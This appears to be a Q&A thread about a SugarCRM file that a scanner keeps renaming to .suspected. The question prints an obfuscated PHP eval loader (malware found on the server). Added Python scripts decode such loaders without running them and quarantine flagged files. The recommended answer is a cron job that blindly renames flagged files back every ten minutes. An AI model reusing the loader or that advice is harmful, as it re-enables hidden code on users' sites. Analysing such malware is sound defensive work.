Problem description
For the last 4 days we have been facing a strange issue on our production server (an AWS EC2 instance), specific to only one site, which is SugarCRM.
The issue is that the file /home/site_folder/public_html/include/MassUpdate.php is automatically renamed to /home/site_folder/public_html/include/MassUpdate.php.suspected
This happens 2-3 times a day, with a gap of 3-4 hours. The issue occurs only for this specific site; it does not even occur on the staging replica of the same site. I even checked the code of that file on both sites, and it is the same.
We have Googled and found that such issues occur mostly for WordPress sites and could be caused by an attack. But we checked our server for attacks, and there aren't any. Also, there is no virus/malware scan running on the server.
What should we do?
Update: We found a few things after going through this link. We executed egrep -Rl 'function.*for.*strlen.*isset' /home/username/public_html/
and found that there are a few files with the following sample code.
<?php
function flnftovr($hkbfqecms, $bezzmczom){$ggy = ''; for($i=0; $i < strlen($hkbfqecms); $i++){$ggy .= isset($bezzmczom[$hkbfqecms[$i]]) ? $bezzmczom[$hkbfqecms[$i]] : $hkbfqecms[$i];}
$ixo="base64_decode";return $ixo($ggy);}
$s = 'DMtncCPWxODe8uC3hgP3OuEKx3hjR5dCy56kT6kmcJdkOBqtSZ91NMP1OuC3hgP3h3hjRamkT6kmcJdkOBqtSZ91NJV'.
'0OuC0xJqvSMtKNtPXcJvt8369GZpsZpQWxOlzSMtrxCPjcJvkSZ96byjbZgtgbMtWhuCXbZlzHXCoCpCob'.'zxJd7Nultb4qthgtfNMtixo9phgCWbopsZ1X=';
$koicev = Array('1'=>'n', '0'=>'4', '3'=>'y', '2'=>'8', '5'=>'E', '4'=>'H', '7'=>'j', '6'=>'w', '9'=>'g', '8'=>'J', 'A'=>'Y', 'C'=>'V', 'B'=>'3', 'E'=>'x', 'D'=>'Q', 'G'=>'M', 'F'=>'i', 'I'=>'P', 'H'=>'U', 'K'=>'v', 'J'=>'W', 'M'=>'G', 'L'=>'L', 'O'=>'X', 'N'=>'b', 'Q'=>'B', 'P'=>'9', 'S'=>'d', 'R'=>'I', 'U'=>'r', 'T'=>'O', 'W'=>'z', 'V'=>'F', 'Y'=>'q', 'X'=>'0', 'Z'=>'C', 'a'=>'D', 'c'=>'a', 'b'=>'K', 'e'=>'o', 'd'=>'5', 'g'=>'m', 'f'=>'h', 'i'=>'6', 'h'=>'c', 'k'=>'p', 'j'=>'s', 'm'=>'A', 'l'=>'R', 'o'=>'S', 'n'=>'u', 'q'=>'N', 'p'=>'k', 's'=>'7', 'r'=>'t', 'u'=>'2', 't'=>'l', 'w'=>'e', 'v'=>'1', 'y'=>'T', 'x'=>'Z', 'z'=>'f');
eval(flnftovr($s, $koicev));?>
It seems to be some malware; how do we go about removing it permanently?
Thanks
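The obfuscation in the files above is a per-character substitution table applied to a string, followed by base64_decode and eval. As an added example (not code from the post, and not SugarCRM code), the following Python triage script walks a web root, flags PHP files that match the question's egrep pattern and also contain an eval() call, lists files a scanner has already renamed to .suspected, and decodes each flagged loader's payload the same way the loader would but without executing it, so the payload can be read instead of run. It runs on a constructed directory tree containing an invented harmless payload; the regexes, function names and fixture are assumptions of this example, not part of the question.

```python
"""Static triage for the substitution-map + base64 + eval PHP loader pattern.

Added example, not code from the original post. Nothing here executes PHP:
the payload is decoded for reading only. The fixture at the bottom is
constructed for the demo and is not material from the incident.
"""
import base64
import re
import string
import tempfile
from pathlib import Path

# Same per-line signature as the question's egrep, plus the eval() sink.
LOADER_RE = re.compile(r"function.*for.*strlen.*isset")
EVAL_RE = re.compile(r"\beval\s*\(")
# A variable assigned one or more single-quoted pieces, optionally joined by '.'
PAYLOAD_RE = re.compile(r"\$\w+\s*=\s*((?:'[^']*'\s*\.?\s*)+);", re.S)
PIECE_RE = re.compile(r"'([^']*)'")
MAP_RE = re.compile(r"array\s*\((.*?)\)\s*;", re.S | re.I)
PAIR_RE = re.compile(r"'(.)'\s*=>\s*'(.)'")


def looks_like_loader(src):
    """True when a line has the map-loop shape and the file feeds something to eval()."""
    return bool(LOADER_RE.search(src) and EVAL_RE.search(src))


def extract_payload(src):
    """Longest single-quoted (possibly '.'-concatenated) string literal in the file."""
    best = ""
    for m in PAYLOAD_RE.finditer(src):
        joined = "".join(PIECE_RE.findall(m.group(1)))
        if len(joined) > len(best):
            best = joined
    return best


def extract_map(src):
    """Substitution table from the Array('x'=>'y', ...) literal, or {} if absent."""
    m = MAP_RE.search(src)
    return dict(PAIR_RE.findall(m.group(1))) if m else {}


def decode_payload(payload, mapping):
    """Apply the per-character substitution, then base64-decode. No eval."""
    translated = "".join(mapping.get(ch, ch) for ch in payload)
    return base64.b64decode(translated)


def triage_file(path):
    """Decoded payload of a loader-style file, or None if the file is not one."""
    src = path.read_text(errors="replace")
    if not looks_like_loader(src):
        return None
    payload, mapping = extract_payload(src), extract_map(src)
    try:
        decoded = decode_payload(payload, mapping).decode("utf-8", "replace")
    except ValueError:  # binascii.Error: bad padding / length
        decoded = "<payload did not base64-decode; inspect by hand>"
    return {"file": str(path), "decoded": decoded}


def triage_tree(root):
    """Loader-style PHP files plus anything a scanner already renamed to .suspected."""
    loaders = [r for p in sorted(root.rglob("*.php")) if (r := triage_file(p))]
    suspected = [str(p) for p in sorted(root.rglob("*.suspected"))]
    return {"loaders": loaders, "suspected": suspected}


# ---- constructed fixture (invented for this demo, not from the incident) ----
_ALPHABET = string.ascii_uppercase + string.ascii_lowercase + string.digits + "+/"
# decode table: obfuscated character -> real base64 character (a fixed rotation)
FIXTURE_MAP = {_ALPHABET[(i + 7) % 64]: _ALPHABET[i] for i in range(64)}
FIXTURE_PLAINTEXT = 'echo "constructed benign payload";'


def build_fixture_loader():
    """PHP text with the same loader shape as the sample, wrapping a harmless payload."""
    real_b64 = base64.b64encode(FIXTURE_PLAINTEXT.encode()).decode()
    inverse = {v: k for k, v in FIXTURE_MAP.items()}
    obfuscated = "".join(inverse.get(ch, ch) for ch in real_b64)
    half = len(obfuscated) // 2  # split over two lines like the sample
    array_literal = ", ".join(f"'{k}'=>'{v}'" for k, v in FIXTURE_MAP.items())
    return (
        "<?php\nfunction f($a, $b){$o = ''; for($i=0; $i < strlen($a); $i++)"
        "{$o .= isset($b[$a[$i]]) ? $b[$a[$i]] : $a[$i];} return base64_decode($o);}\n"
        f"$s = '{obfuscated[:half]}'.\n'{obfuscated[half:]}';\n"
        f"$m = Array({array_literal});\n"
        "eval(f($s, $m));?>\n"
    )


def write_constructed_tree(root):
    """One dropped loader, one clean file, one scanner-renamed file."""
    (root / "include").mkdir(parents=True, exist_ok=True)
    (root / "include" / "dropped.php").write_text(build_fixture_loader())
    (root / "include" / "Clean.php").write_text("<?php echo 'hello';\n")
    (root / "include" / "MassUpdate.php.suspected").write_text("<?php // renamed by scanner\n")


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        write_constructed_tree(Path(tmp))
        print(triage_tree(Path(tmp)))
```

Point triage_tree at the real public_html to get the same report for the production tree; the decoded text of each loader is what eval would have run, which is usually enough to see what the dropped file was for and where else it writes.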
Recommended answer
Posting this answer; it may help others.
- Create a file with a '.sh' extension at a location convenient for you.
- Add the following code to it.
#Rename your_file_name.php.suspected to your_file_name.php
mv /<path_to_your_file>/your_file_name.php.suspected /<path_to_your_file>/your_file_name.php
- Save this file.
- Set up a cron in crontab with the following line, running every 10 minutes (or whatever interval you need):
*/10 * * * * path_to_cron_file.sh
- Restart the crontab service.
You will find a lot of documentation on creating cron jobs on Google.
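The cron job above renames every .suspected file straight back into place. As an added example, not part of the answer, the Python sweep below first compares each .suspected file with the matching file in a known-good reference copy (the staging replica the question mentions, assumed here to live at a parallel path), restores it only when the SHA-256 hashes match, and moves anything that differs or has no reference into a quarantine directory instead of re-enabling it. All directory names and file contents are constructed for the example.

```python
"""Restore-or-quarantine sweep for files a scanner renamed to *.suspected.

Added example, not the answer's script. A .suspected file is renamed back
only if it is byte-identical to the same file in a known-good reference
tree; otherwise it is moved to a quarantine directory for analysis.
Paths and contents below are constructed for the demo.
"""
import hashlib
import shutil
import tempfile
from pathlib import Path

SUFFIX = ".suspected"


def sha256_of(path):
    """Streaming SHA-256 of a file."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def restore_or_quarantine(suspected, webroot, reference_root, quarantine):
    """Return 'restored' or 'quarantined' after acting on one .suspected file."""
    original = suspected.with_name(suspected.name[: -len(SUFFIX)])
    rel = original.relative_to(webroot)            # e.g. include/MassUpdate.php
    reference = reference_root / rel
    if reference.is_file() and sha256_of(suspected) == sha256_of(reference):
        suspected.rename(original)                  # identical to known-good copy
        return "restored"
    dest_dir = quarantine / rel.parent              # keep the relative layout
    dest_dir.mkdir(parents=True, exist_ok=True)
    shutil.move(str(suspected), str(dest_dir / suspected.name))
    return "quarantined"


def sweep(webroot, reference_root, quarantine):
    """Act on every .suspected file under webroot; map relative path -> outcome."""
    results = {}
    for p in sorted(webroot.rglob("*" + SUFFIX)):
        rel = str(p.relative_to(webroot))
        results[rel] = restore_or_quarantine(p, webroot, reference_root, quarantine)
    return results


def write_constructed_tree(base):
    """Constructed layout: production webroot, staging reference copy, quarantine."""
    prod = base / "prod" / "public_html"
    staging = base / "staging" / "public_html"
    quarantine = base / "quarantine"
    for root in (prod, staging):
        (root / "include").mkdir(parents=True)
    genuine = "<?php // genuine MassUpdate.php (constructed)\n"
    (staging / "include" / "MassUpdate.php").write_text(genuine)
    (prod / "include" / "MassUpdate.php.suspected").write_text(genuine)   # identical -> restore
    (staging / "include" / "utils.php").write_text("<?php // genuine utils (constructed)\n")
    (prod / "include" / "utils.php.suspected").write_text("<?php // modified copy (constructed)\n")  # differs -> quarantine
    (prod / "include" / "dropped.php.suspected").write_text("<?php // no reference (constructed)\n")  # unknown -> quarantine
    return prod, staging, quarantine


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        prod, staging, quarantine = write_constructed_tree(Path(tmp))
        for rel, outcome in sweep(prod, staging, quarantine).items():
            print(f"{outcome:12s} {rel}")
```

Run sweep from the same cron entry instead of a bare mv; the quarantine directory then accumulates exactly the files worth looking at, and a file that keeps being flagged while matching the reference copy points at the scanner's signature rather than at the file.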